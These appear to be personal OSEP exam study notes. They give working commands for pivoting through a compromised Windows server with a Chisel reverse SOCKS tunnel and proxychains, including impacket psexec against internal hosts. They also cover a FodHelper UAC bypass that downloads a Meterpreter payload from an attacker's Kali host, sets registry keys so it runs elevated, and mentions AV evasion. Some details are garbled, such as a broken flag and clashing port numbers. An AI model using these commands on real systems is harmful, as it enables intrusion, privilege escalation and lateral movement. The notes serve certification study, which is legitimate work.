OSEP Additional Note

1. Pivot with Chisel

Upload chisel/chisel.exe from Kali to c:\windows\tasks on victim server
Check your proxychains config on your Kali at /etc/proxychains4.conf . It must open
a port for listen as a proxy server

On my Kali, I config Proxychains use port 1080 for proxy server listener port
On your Kali, run follow command to create 1 Chisel server: ./chisel server -p 8080 -
-socks5 --reverse :

This command will instruct Chisel use socks5 info on /etc/proxychains to create
a chisel server with listening port is 1085
On victim, run a Chisel client to connect tunnel to the Chisel server on our Kali:
.\chisel.exe client -v 192.168.49.109:8080 R:1080:socks
bot chisel and chisel.exe are the same command above

If success, on Chisel server at Kali will appear this Listening line:

→ After that, you can use proxychains to pivot any command from your Kali directly to
internal network:

proxychains4 ssh internal.user@internal.host

proxychains mongo "mongodb://internal.host:27017/internal_service"
proxychains python3 /usr/share/doc/python3-impacket/examples/psexec.py
username:passwd@internal.host

2. FodHelper bypass UAC

Must run fodhelper.exe on x64 shell. Check shell: [Environment]::Is64BitProcess

# Put the payload in C:\Meterpreter.exe

Invoke-WebRequest -Uri http://IP_KALI/Meterpreter.exe -Outfile

c:\windows\tasks\Meterpreter.exe;

# Configure the exploit

New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force

New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command"

-Name "DelegateExecute" -Value "" -Force

Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command"

-Name "(default)" -Value "C:\\windows\\tasks\\Meterpreter.exe" -Force

# Run it! And FodHelper will execute our c:\windows\tasks\Meterpreter.exe

C:\Windows\System32\fodhelper.exe

Sometimes, you need create your Meterpreter.exe by Process Hollowing + encrypted

shellcode to AV evasion.